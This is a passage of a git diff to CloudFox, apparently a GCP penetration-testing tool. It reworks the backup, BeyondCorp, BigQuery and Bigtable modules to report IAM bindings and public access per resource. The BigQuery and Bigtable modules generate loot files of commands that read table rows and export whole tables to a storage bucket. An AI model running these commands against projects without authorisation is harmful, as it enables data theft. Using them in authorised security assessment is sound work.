+ if r.SizeGB > 0 { + sizeStr = fmt.Sprintf("%d", r.SizeGB) + } - // Unprotected Resources table - unprotectedHeader := []string{ - "Resource", - "Project Name", - "Project ID", - "Type", - "Location", - "Size (GB)", - "Risk", - "Reason", - } + countStr := "" + if r.BackupCount > 0 { + countStr = fmt.Sprintf("%d", r.BackupCount) + } - var unprotectedBody [][]string - for _, r := range m.UnprotectedResources { - unprotectedBody = append(unprotectedBody, []string{ - r.Name, - m.GetProjectName(r.ProjectID), - r.ProjectID, - r.ResourceType, - r.Location, - fmt.Sprintf("%d", r.SizeGB), - r.RiskLevel, - truncateString(r.Reason, 30), - }) + body = append(body, []string{ + r.ProjectID, + m.GetProjectName(r.ProjectID), + r.Name, + r.ResourceType, + r.Location, + sizeStr, + protectedStr, + r.BackupType, + r.Schedule, + retentionStr, + r.LastBackup, + countStr, + r.BackupStatus, + pitrStr, + }) + } - // Add remediation to loot - m.LootMap["backup-commands"].Contents += fmt.Sprintf( - "# %s (%s)\n%s\n\n", - r.Name, r.ResourceType, r.Remediation, - ) + tables = append(tables, internal.TableFile{ + Name: "backup-inventory", + Header: header, + Body: body, + }) } - // Backup Policies table - policiesHeader := []string{ - "Policy", - "Project Name", - "Project ID", - "Type", - "Schedule", - "Retention", - "Status", - } + // Snapshots table (one row per IAM binding member) + if len(m.Snapshots) > 0 { + header := []string{ + "Project ID", + "Project Name", + "Snapshot", + "Source Disk", + "Size (GB)", + "Created", + "Status", + "Type", + "Auto Created", + "Locations", + "Role", + "Member", + "Public", + } - var policiesBody [][]string - for _, p := range m.BackupPolicies { - policiesBody = append(policiesBody, []string{ - p.Name, - m.GetProjectName(p.ProjectID), - p.ProjectID, - p.ResourceType, - p.Schedule, - fmt.Sprintf("%d days", p.RetentionDays), - p.Status, - }) - } + var body [][]string + for _, s := range m.Snapshots { + autoCreatedStr := "No" + if s.AutoCreated { + autoCreatedStr = "Yes" + } - // Snapshots table - snapshotsHeader := []string{ - "Snapshot", - "Project Name", - "Project ID", - "Source Disk", - "Size (GB)", - "Created", - "Status", - } + publicAccess := "No" + if s.PublicAccess { + publicAccess = "Yes" + } - var snapshotsBody [][]string - for _, s := range m.Snapshots { - snapshotsBody = append(snapshotsBody, []string{ - s.Name, - m.GetProjectName(s.ProjectID), - s.ProjectID, - m.extractDiskName(s.SourceDisk), - fmt.Sprintf("%d", s.DiskSizeGB), - truncateString(s.CreationTime, 20), - s.Status, + // If no IAM bindings, still show the snapshot + if len(s.IAMBindings) == 0 { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range s.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + s.ProjectID, + m.GetProjectName(s.ProjectID), + s.Name, + m.extractDiskName(s.SourceDisk), + fmt.Sprintf("%d", s.DiskSizeGB), + s.CreationTime, + s.Status, + s.SnapshotType, + autoCreatedStr, + strings.Join(s.StorageLocats, ","), + binding.Role, + member, + publicAccess, + }) + } + } + } + } + + tables = append(tables, internal.TableFile{ + Name: "backup-snapshots", + Header: header, + Body: body, }) } @@ -832,53 +714,16 @@ func (m *BackupInventoryModule) writeOutput(ctx context.Context, logger internal } } - // Build tables - tables := []internal.TableFile{} - - if len(protectedBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "protected-resources", - Header: protectedHeader, - Body: protectedBody, - }) - } - - if len(unprotectedBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "unprotected-resources", - Header: unprotectedHeader, - Body: unprotectedBody, - }) - } - - if len(policiesBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "backup-policies", - Header: policiesHeader, - Body: policiesBody, - }) - } - - if len(snapshotsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "snapshots", - Header: snapshotsHeader, - Body: snapshotsBody, - }) - } - output := BackupInventoryOutput{ Table: tables, Loot: lootFiles, } - // Build scope names with project names scopeNames := make([]string, len(m.ProjectIDs)) for i, projectID := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(projectID) } - // Write output err := internal.HandleOutputSmart( "gcp", m.Format, diff --git a/gcp/commands/beyondcorp.go b/gcp/commands/beyondcorp.go index d76e69d0..3741a5e6 100644 --- a/gcp/commands/beyondcorp.go +++ b/gcp/commands/beyondcorp.go @@ -67,9 +67,29 @@ func (m *BeyondCorpModule) Execute(ctx context.Context, logger internal.Logger) return } + // Count public resources + publicConnectorCount := 0 + publicConnectionCount := 0 + for _, connector := range m.AppConnectors { + if connector.PublicAccess { + publicConnectorCount++ + } + } + for _, conn := range m.AppConnections { + if conn.PublicAccess { + publicConnectionCount++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d connector(s), %d connection(s)", len(m.AppConnectors), len(m.AppConnections)), globals.GCP_BEYONDCORP_MODULE_NAME) + + if publicConnectorCount > 0 || publicConnectionCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public connector(s), %d public connection(s)!", + publicConnectorCount, publicConnectionCount), globals.GCP_BEYONDCORP_MODULE_NAME) + } + m.writeOutput(ctx, logger) } @@ -100,43 +120,67 @@ func (m *BeyondCorpModule) processProject(ctx context.Context, projectID string, } func (m *BeyondCorpModule) initializeLootFiles() { - m.LootMap["beyondcorp-connections"] = &internal.LootFile{ - Name: "beyondcorp-connections", - Contents: "# BeyondCorp Connections\n# Generated by CloudFox\n\n", - } - m.LootMap["beyondcorp-endpoints"] = &internal.LootFile{ - Name: "beyondcorp-endpoints", - Contents: "", + m.LootMap["beyondcorp-details"] = &internal.LootFile{ + Name: "beyondcorp-details", + Contents: "# BeyondCorp Details\n# Generated by CloudFox\n\n", } } func (m *BeyondCorpModule) addConnectionToLoot(conn beyondcorpservice.AppConnectionInfo) { - m.LootMap["beyondcorp-connections"].Contents += fmt.Sprintf( - "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n\n", + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf( + "# Connection: %s\n# Endpoint: %s\n# Gateway: %s\n# Connectors: %s\n", conn.Name, conn.ApplicationEndpoint, conn.Gateway, strings.Join(conn.Connectors, ", ")) if conn.ApplicationEndpoint != "" { - m.LootMap["beyondcorp-endpoints"].Contents += fmt.Sprintf("%s # %s\n", conn.ApplicationEndpoint, conn.Name) + m.LootMap["beyondcorp-details"].Contents += fmt.Sprintf("# Application Endpoint: %s\n", conn.ApplicationEndpoint) } + m.LootMap["beyondcorp-details"].Contents += "\n" } func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logger) { var tables []internal.TableFile - // App Connectors table + // App Connectors table (one row per IAM binding member) if len(m.AppConnectors) > 0 { - header := []string{"Name", "Location", "State", "Service Account", "Risk", "Project Name", "Project"} + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Service Account", "Role", "Member", "Public"} var body [][]string for _, connector := range m.AppConnectors { - body = append(body, []string{ - connector.Name, - connector.Location, - connector.State, - connector.PrincipalInfo, - connector.RiskLevel, - m.GetProjectName(connector.ProjectID), - connector.ProjectID, - }) + publicAccess := "No" + if connector.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connector + if len(connector.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range connector.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(connector.ProjectID), + connector.ProjectID, + connector.Name, + connector.Location, + connector.State, + connector.PrincipalInfo, + binding.Role, + member, + publicAccess, + }) + } + } + } } tables = append(tables, internal.TableFile{ Name: "beyondcorp-connectors", @@ -145,21 +189,49 @@ func (m *BeyondCorpModule) writeOutput(ctx context.Context, logger internal.Logg }) } - // App Connections table + // App Connections table (one row per IAM binding member) if len(m.AppConnections) > 0 { - header := []string{"Name", "Location", "State", "Endpoint", "Gateway", "Risk", "Project Name", "Project"} + header := []string{"Project Name", "Project ID", "Name", "Location", "State", "Endpoint", "Gateway", "Role", "Member", "Public"} var body [][]string for _, conn := range m.AppConnections { - body = append(body, []string{ - conn.Name, - conn.Location, - conn.State, - conn.ApplicationEndpoint, - conn.Gateway, - conn.RiskLevel, - m.GetProjectName(conn.ProjectID), - conn.ProjectID, - }) + publicAccess := "No" + if conn.PublicAccess { + publicAccess = "Yes" + } + + // If no IAM bindings, still show the connection + if len(conn.IAMBindings) == 0 { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range conn.IAMBindings { + for _, member := range binding.Members { + body = append(body, []string{ + m.GetProjectName(conn.ProjectID), + conn.ProjectID, + conn.Name, + conn.Location, + conn.State, + conn.ApplicationEndpoint, + conn.Gateway, + binding.Role, + member, + publicAccess, + }) + } + } + } } tables = append(tables, internal.TableFile{ Name: "beyondcorp-connections", diff --git a/gcp/commands/bigquery.go b/gcp/commands/bigquery.go index 911360bc..c5cf3dfc 100644 --- a/gcp/commands/bigquery.go +++ b/gcp/commands/bigquery.go @@ -5,12 +5,11 @@ import ( "fmt" "strings" "sync" - "time" BigQueryService "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" ) @@ -140,171 +139,42 @@ func (m *BigQueryModule) processProject(ctx context.Context, projectID string, l // Loot File Management // ------------------------------ func (m *BigQueryModule) initializeLootFiles() { - m.LootMap["bigquery-bq-commands"] = &internal.LootFile{ - Name: "bigquery-bq-commands", - Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["bigquery-gcloud-commands"] = &internal.LootFile{ - Name: "bigquery-gcloud-commands", - Contents: "# GCP BigQuery gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["bigquery-exploitation"] = &internal.LootFile{ - Name: "bigquery-exploitation", - Contents: "# GCP BigQuery Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["bigquery-public-datasets"] = &internal.LootFile{ - Name: "bigquery-public-datasets", - Contents: "# GCP BigQuery Public Datasets\n# Generated by CloudFox\n# These datasets have public access (allUsers or allAuthenticatedUsers)\n\n", - } - m.LootMap["bigquery-access-bindings"] = &internal.LootFile{ - Name: "bigquery-access-bindings", - Contents: "# GCP BigQuery Dataset Access Bindings\n# Generated by CloudFox\n\n", - } - m.LootMap["bigquery-views"] = &internal.LootFile{ - Name: "bigquery-views", - Contents: "# GCP BigQuery Views\n# Generated by CloudFox\n# Views may expose data from other datasets\n\n", - } - m.LootMap["bigquery-google-managed-encryption"] = &internal.LootFile{ - Name: "bigquery-google-managed-encryption", - Contents: "# Datasets Using Google-Managed Encryption\n# Generated by CloudFox\n# Consider CMEK for compliance requirements\n\n", - } - m.LootMap["bigquery-cmek"] = &internal.LootFile{ - Name: "bigquery-cmek", - Contents: "# Datasets Using CMEK (Customer-Managed Encryption Keys)\n# Generated by CloudFox\n\n", - } - m.LootMap["bigquery-security-recommendations"] = &internal.LootFile{ - Name: "bigquery-security-recommendations", - Contents: "# BigQuery Security Recommendations\n# Generated by CloudFox\n# Remediation commands for security issues\n\n", - } - m.LootMap["bigquery-large-tables"] = &internal.LootFile{ - Name: "bigquery-large-tables", - Contents: "# Large BigQuery Tables (>1GB)\n# Generated by CloudFox\n# These tables may contain significant data\n\n", + m.LootMap["bigquery-commands"] = &internal.LootFile{ + Name: "bigquery-commands", + Contents: "# GCP BigQuery Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *BigQueryModule) addDatasetToLoot(dataset BigQueryService.BigqueryDataset) { - // bq commands for enumeration - m.LootMap["bigquery-bq-commands"].Contents += fmt.Sprintf( - "# Dataset: %s (Project: %s, Location: %s)\n"+ + // All commands for this dataset + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Dataset: %s (Project: %s, Location: %s)\n"+ + "# Show dataset info\n"+ "bq show --project_id=%s %s\n"+ + "bq show --format=prettyjson %s:%s\n\n"+ + "# List tables in dataset\n"+ "bq ls --project_id=%s %s\n\n", dataset.DatasetID, dataset.ProjectID, dataset.Location, dataset.ProjectID, dataset.DatasetID, dataset.ProjectID, dataset.DatasetID, - ) - - // gcloud commands - m.LootMap["bigquery-gcloud-commands"].Contents += fmt.Sprintf( - "# Dataset: %s\n"+ - "gcloud alpha bq datasets describe %s --project=%s\n"+ - "bq show --format=prettyjson %s:%s\n\n", - dataset.DatasetID, - dataset.DatasetID, dataset.ProjectID, dataset.ProjectID, dataset.DatasetID, ) - - // Add to public datasets loot if public - if dataset.IsPublic { - m.LootMap["bigquery-public-datasets"].Contents += fmt.Sprintf( - "# Dataset: %s (Project: %s)\n"+ - "# Public Access: %s\n"+ - "# Location: %s\n"+ - "bq show --project_id=%s %s\n\n", - dataset.DatasetID, dataset.ProjectID, - dataset.PublicAccess, - dataset.Location, - dataset.ProjectID, dataset.DatasetID, - ) - } - - // Add access bindings to loot - if len(dataset.AccessEntries) > 0 { - m.LootMap["bigquery-access-bindings"].Contents += fmt.Sprintf( - "# Dataset: %s (Project: %s)\n", - dataset.DatasetID, dataset.ProjectID, - ) - for _, entry := range dataset.AccessEntries { - m.LootMap["bigquery-access-bindings"].Contents += fmt.Sprintf( - " Role: %s, Type: %s, Entity: %s\n", - entry.Role, entry.EntityType, entry.Entity, - ) - } - m.LootMap["bigquery-access-bindings"].Contents += "\n" - } - - // Encryption status - if dataset.EncryptionType == "Google-managed" || dataset.EncryptionType == "" { - m.LootMap["bigquery-google-managed-encryption"].Contents += fmt.Sprintf( - "# DATASET: %s (Project: %s, Location: %s)\n"+ - "# Encryption: Google-managed\n"+ - "# Enable CMEK with:\n"+ - "bq update --destination_kms_key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY %s:%s\n\n", - dataset.DatasetID, dataset.ProjectID, dataset.Location, - dataset.ProjectID, dataset.DatasetID, - ) - } else if dataset.EncryptionType == "CMEK" { - m.LootMap["bigquery-cmek"].Contents += fmt.Sprintf( - "# DATASET: %s (Project: %s, Location: %s)\n"+ - "# Encryption: CMEK\n"+ - "# KMS Key: %s\n\n", - dataset.DatasetID, dataset.ProjectID, dataset.Location, dataset.KMSKeyName, - ) - } - - // Security recommendations - m.addDatasetSecurityRecommendations(dataset) -} - -// addDatasetSecurityRecommendations adds remediation commands for dataset security issues -func (m *BigQueryModule) addDatasetSecurityRecommendations(dataset BigQueryService.BigqueryDataset) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# DATASET: %s (Project: %s, Location: %s)\n", - dataset.DatasetID, dataset.ProjectID, dataset.Location, - ) - - // Public access - if dataset.IsPublic { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Public access (%s)\n"+ - "# Remove public access with:\n"+ - "bq show --format=prettyjson %s:%s > /tmp/acl.json\n"+ - "# Edit /tmp/acl.json to remove allUsers/allAuthenticatedUsers\n"+ - "bq update --source=/tmp/acl.json %s:%s\n\n", - dataset.PublicAccess, - dataset.ProjectID, dataset.DatasetID, - dataset.ProjectID, dataset.DatasetID, - ) - } - - // Google-managed encryption (consider CMEK) - if dataset.EncryptionType == "Google-managed" || dataset.EncryptionType == "" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Using Google-managed encryption\n"+ - "# Enable CMEK with:\n"+ - "bq update --destination_kms_key=projects/PROJECT/locations/LOCATION/keyRings/RING/cryptoKeys/KEY %s:%s\n\n", - dataset.ProjectID, dataset.DatasetID, - ) - } - - if hasRecommendations { - m.LootMap["bigquery-security-recommendations"].Contents += recommendations + "\n" - } } func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { - // Exploitation commands for tables - m.LootMap["bigquery-exploitation"].Contents += fmt.Sprintf( - "# Table: %s.%s (Project: %s)\n"+ - "# Size: %d bytes\n"+ + // Table info and query commands + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "## Table: %s.%s (Project: %s)\n"+ + "# Type: %s, Size: %d bytes, Rows: %d\n"+ + "# Show table schema:\n"+ + "bq show --schema --project_id=%s %s:%s.%s\n"+ "# Query first 100 rows:\n"+ "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 100'\n"+ "# Export table to GCS:\n"+ "bq extract --project_id=%s '%s:%s.%s' gs:///export_%s_%s.json\n\n", table.DatasetID, table.TableID, table.ProjectID, - table.NumBytes, + table.TableType, table.NumBytes, table.NumRows, + table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, table.DatasetID, table.TableID, ) @@ -315,166 +185,143 @@ func (m *BigQueryModule) addTableToLoot(table BigQueryService.BigqueryTable) { if len(viewQuery) > 200 { viewQuery = viewQuery[:200] + "..." } - m.LootMap["bigquery-views"].Contents += fmt.Sprintf( - "# VIEW: %s.%s (Project: %s)\n"+ - "# Type: %s\n"+ + m.LootMap["bigquery-commands"].Contents += fmt.Sprintf( + "# VIEW DEFINITION: %s.%s\n"+ "# Legacy SQL: %v\n"+ "# Query:\n"+ "# %s\n\n", - table.DatasetID, table.TableID, table.ProjectID, - table.TableType, + table.DatasetID, table.TableID, table.UseLegacySQL, strings.ReplaceAll(viewQuery, "\n", "\n# "), ) } - - // Large tables (>1GB) - const oneGB = int64(1024 * 1024 * 1024) - if table.NumBytes > oneGB { - sizeGB := float64(table.NumBytes) / float64(oneGB) - m.LootMap["bigquery-large-tables"].Contents += fmt.Sprintf( - "# TABLE: %s.%s (Project: %s)\n"+ - "# Size: %.2f GB (%d bytes)\n"+ - "# Rows: %d\n"+ - "# Type: %s\n"+ - "# Query:\n"+ - "bq query --project_id=%s --use_legacy_sql=false 'SELECT * FROM `%s.%s.%s` LIMIT 1000'\n\n", - table.DatasetID, table.TableID, table.ProjectID, - sizeGB, table.NumBytes, - table.NumRows, - table.TableType, - table.ProjectID, table.ProjectID, table.DatasetID, table.TableID, - ) - } } // ------------------------------ // Output Generation // ------------------------------ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Dataset table with security columns + // Dataset table with access columns (one row per access entry) datasetHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Dataset ID", - "Name", "Location", "Public", "Encryption", - "Access Entries", - "Creation Time", + "Role", + "Member Type", + "Member", } var datasetBody [][]string + publicCount := 0 for _, dataset := range m.Datasets { - publicStatus := boolToCheckMark(dataset.IsPublic) + publicStatus := "" if dataset.IsPublic { publicStatus = dataset.PublicAccess + publicCount++ } - datasetBody = append(datasetBody, []string{ - m.GetProjectName(dataset.ProjectID), - dataset.ProjectID, - dataset.DatasetID, - dataset.Name, - dataset.Location, - publicStatus, - dataset.EncryptionType, - fmt.Sprintf("%d", len(dataset.AccessEntries)), - dataset.CreationTime.Format(time.RFC3339), - }) + // One row per access entry + if len(dataset.AccessEntries) > 0 { + for _, entry := range dataset.AccessEntries { + memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) + role := entry.Role + // Special access types (View, Routine, Dataset) may not have explicit roles + if role == "" { + role = "READER" // Views/Routines/Datasets grant implicit read access + } + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + role, + memberType, + entry.Entity, + }) + } + } else { + // Dataset with no access entries + datasetBody = append(datasetBody, []string{ + dataset.ProjectID, + m.GetProjectName(dataset.ProjectID), + dataset.DatasetID, + dataset.Location, + publicStatus, + dataset.EncryptionType, + "-", + "-", + "-", + }) + } } - // Table table with security columns + // Table table with security columns (one row per IAM binding member) tableHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Dataset ID", "Table ID", "Type", "Encryption", - "Partitioned", "Rows", - "Size (bytes)", - "Location", - } - - var tableBody [][]string - for _, table := range m.Tables { - partitioned := boolToCheckMark(table.IsPartitioned) - if table.IsPartitioned { - partitioned = table.PartitioningType - } - - tableBody = append(tableBody, []string{ - m.GetProjectName(table.ProjectID), - table.ProjectID, - table.DatasetID, - table.TableID, - table.TableType, - table.EncryptionType, - partitioned, - fmt.Sprintf("%d", table.NumRows), - fmt.Sprintf("%d", table.NumBytes), - table.Location, - }) - } - - // Access bindings table (one row per access entry) - accessHeader := []string{ - "Dataset", - "Project Name", - "Project ID", - "Location", + "Public", "Role", - "Member Type", "Member", } - var accessBody [][]string - for _, dataset := range m.Datasets { - for _, entry := range dataset.AccessEntries { - memberType := BigQueryService.GetMemberType(entry.EntityType, entry.Entity) - accessBody = append(accessBody, []string{ - dataset.DatasetID, - m.GetProjectName(dataset.ProjectID), - dataset.ProjectID, - dataset.Location, - entry.Role, - memberType, - entry.Entity, - }) + var tableBody [][]string + publicTableCount := 0 + for _, table := range m.Tables { + publicStatus := "" + if table.IsPublic { + publicStatus = table.PublicAccess + publicTableCount++ } - } - // Public datasets table - publicHeader := []string{ - "Dataset", - "Project Name", - "Project ID", - "Location", - "Public Access", - "Encryption", - } - - var publicBody [][]string - for _, dataset := range m.Datasets { - if dataset.IsPublic { - publicBody = append(publicBody, []string{ - dataset.DatasetID, - m.GetProjectName(dataset.ProjectID), - dataset.ProjectID, - dataset.Location, - dataset.PublicAccess, - dataset.EncryptionType, + // If no IAM bindings, still show the table + if len(table.IAMBindings) == 0 { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + "-", + "-", }) + } else { + // One row per member per role + for _, binding := range table.IAMBindings { + for _, member := range binding.Members { + tableBody = append(tableBody, []string{ + table.ProjectID, + m.GetProjectName(table.ProjectID), + table.DatasetID, + table.TableID, + table.TableType, + table.EncryptionType, + fmt.Sprintf("%d", table.NumRows), + publicStatus, + binding.Role, + member, + }) + } + } } } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -493,23 +340,8 @@ func (m *BigQueryModule) writeOutput(ctx context.Context, logger internal.Logger }, } - // Add access bindings table if there are entries - if len(accessBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "bigquery-access", - Header: accessHeader, - Body: accessBody, - }) - } - - // Add public datasets table if there are public datasets - if len(publicBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "bigquery-public", - Header: publicHeader, - Body: publicBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", len(publicBody)), globals.GCP_BIGQUERY_MODULE_NAME) + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible dataset(s)!", publicCount), globals.GCP_BIGQUERY_MODULE_NAME) } output := BigQueryOutput{ diff --git a/gcp/commands/bigtable.go b/gcp/commands/bigtable.go index 104acc08..0c0bb9e5 100644 --- a/gcp/commands/bigtable.go +++ b/gcp/commands/bigtable.go @@ -16,14 +16,21 @@ import ( var GCPBigtableCommand = &cobra.Command{ Use: globals.GCP_BIGTABLE_MODULE_NAME, Aliases: []string{"bt"}, - Short: "Enumerate Cloud Bigtable instances", - Long: `Enumerate Cloud Bigtable instances, clusters, and tables.`, - Run: runGCPBigtableCommand, + Short: "Enumerate Cloud Bigtable instances and tables", + Long: `Enumerate Cloud Bigtable instances, clusters, and tables with IAM analysis. + +Features: +- Lists all Bigtable instances with instance-level IAM bindings +- Lists all tables with table-level IAM bindings +- Identifies publicly accessible instances and tables +- Shows cluster information per instance`, + Run: runGCPBigtableCommand, } type BigtableModule struct { gcpinternal.BaseGCPModule Instances []bigtableservice.BigtableInstanceInfo + Tables []bigtableservice.BigtableTableInfo LootMap map[string]*internal.LootFile mu sync.Mutex } @@ -45,6 +52,7 @@ func runGCPBigtableCommand(cmd *cobra.Command, args []string) { module := &BigtableModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), Instances: []bigtableservice.BigtableInstanceInfo{}, + Tables: []bigtableservice.BigtableTableInfo{}, LootMap: make(map[string]*internal.LootFile), } module.initializeLootFiles() @@ -59,19 +67,38 @@ func (m *BigtableModule) Execute(ctx context.Context, logger internal.Logger) { return } - tableCount := 0 + // Count public instances and tables + publicInstanceCount := 0 + publicTableCount := 0 for _, instance := range m.Instances { - tableCount += len(instance.Tables) + if instance.PublicAccess { + publicInstanceCount++ + } + } + for _, table := range m.Tables { + if table.PublicAccess { + publicTableCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d instance(s) with %d table(s)", + len(m.Instances), len(m.Tables)), globals.GCP_BIGTABLE_MODULE_NAME) + + if publicInstanceCount > 0 || publicTableCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d public instance(s), %d public table(s)!", + publicInstanceCount, publicTableCount), globals.GCP_BIGTABLE_MODULE_NAME) } - logger.SuccessM(fmt.Sprintf("Found %d Bigtable instance(s) with %d table(s)", - len(m.Instances), tableCount), globals.GCP_BIGTABLE_MODULE_NAME) m.writeOutput(ctx, logger) } func (m *BigtableModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Bigtable in project: %s", projectID), globals.GCP_BIGTABLE_MODULE_NAME) + } + svc := bigtableservice.New() - instances, err := svc.ListInstances(projectID) + result, err := svc.ListInstances(projectID) if err != nil { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, globals.GCP_BIGTABLE_MODULE_NAME, @@ -80,42 +107,161 @@ func (m *BigtableModule) processProject(ctx context.Context, projectID string, l } m.mu.Lock() - m.Instances = append(m.Instances, instances...) - for _, instance := range instances { - m.addToLoot(instance) + m.Instances = append(m.Instances, result.Instances...) + m.Tables = append(m.Tables, result.Tables...) + for _, instance := range result.Instances { + m.addInstanceToLoot(instance) + } + for _, table := range result.Tables { + m.addTableToLoot(table) } m.mu.Unlock() } func (m *BigtableModule) initializeLootFiles() { - m.LootMap["bigtable-instances"] = &internal.LootFile{ - Name: "bigtable-instances", - Contents: "# Bigtable Instances\n# Generated by CloudFox\n\n", + m.LootMap["bigtable-commands"] = &internal.LootFile{ + Name: "bigtable-commands", + Contents: "# Bigtable Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *BigtableModule) addInstanceToLoot(instance bigtableservice.BigtableInstanceInfo) { + var clusterNames []string + for _, cluster := range instance.Clusters { + clusterNames = append(clusterNames, cluster.Name) } + + m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n"+ + "# Type: %s, State: %s\n"+ + "# Clusters: %s\n"+ + "cbt -project %s -instance %s ls\n\n", + instance.Name, instance.DisplayName, + instance.Type, instance.State, + strings.Join(clusterNames, ", "), + instance.ProjectID, instance.Name, + ) } -func (m *BigtableModule) addToLoot(instance bigtableservice.BigtableInstanceInfo) { - m.LootMap["bigtable-instances"].Contents += fmt.Sprintf( - "# Instance: %s (%s)\n# Type: %s\n# Tables: %s\n# Clusters: %d\n\n", - instance.Name, instance.DisplayName, instance.Type, - strings.Join(instance.Tables, ", "), - len(instance.Clusters)) +func (m *BigtableModule) addTableToLoot(table bigtableservice.BigtableTableInfo) { + m.LootMap["bigtable-commands"].Contents += fmt.Sprintf( + "# Table: %s (Instance: %s)\n"+ + "cbt -project %s -instance %s read %s count=10\n\n", + table.Name, table.InstanceName, + table.ProjectID, table.InstanceName, table.Name, + ) } func (m *BigtableModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Display Name", "Type", "Tables", "Clusters", "State", "Project Name", "Project"} + var tables []internal.TableFile - var body [][]string + // Instances table (one row per IAM binding member) + instanceHeader := []string{"Project Name", "Project ID", "Instance", "Display Name", "Type", "State", "Clusters", "Role", "Member", "Public"} + + var instanceBody [][]string for _, instance := range m.Instances { - body = append(body, []string{ - instance.Name, - instance.DisplayName, - instance.Type, - strings.Join(instance.Tables, ", "), - fmt.Sprintf("%d", len(instance.Clusters)), - instance.State, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, + publicAccess := "No" + if instance.PublicAccess { + publicAccess = "Yes" + } + + // Build cluster info string: "name (location)" for each cluster + var clusterDetails []string + for _, cluster := range instance.Clusters { + clusterDetails = append(clusterDetails, fmt.Sprintf("%s (%s)", cluster.Name, cluster.Location)) + } + clusters := "-" + if len(clusterDetails) > 0 { + clusters = strings.Join(clusterDetails, ", ") + } + + // If no IAM bindings, still show the instance + if len(instance.IAMBindings) == 0 { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.DisplayName, + instance.Type, + instance.State, + clusters, + "-", + "-", + publicAccess, + }) + } else { + // One row per member per role + for _, binding := range instance.IAMBindings { + for _, member := range binding.Members { + instanceBody = append(instanceBody, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + 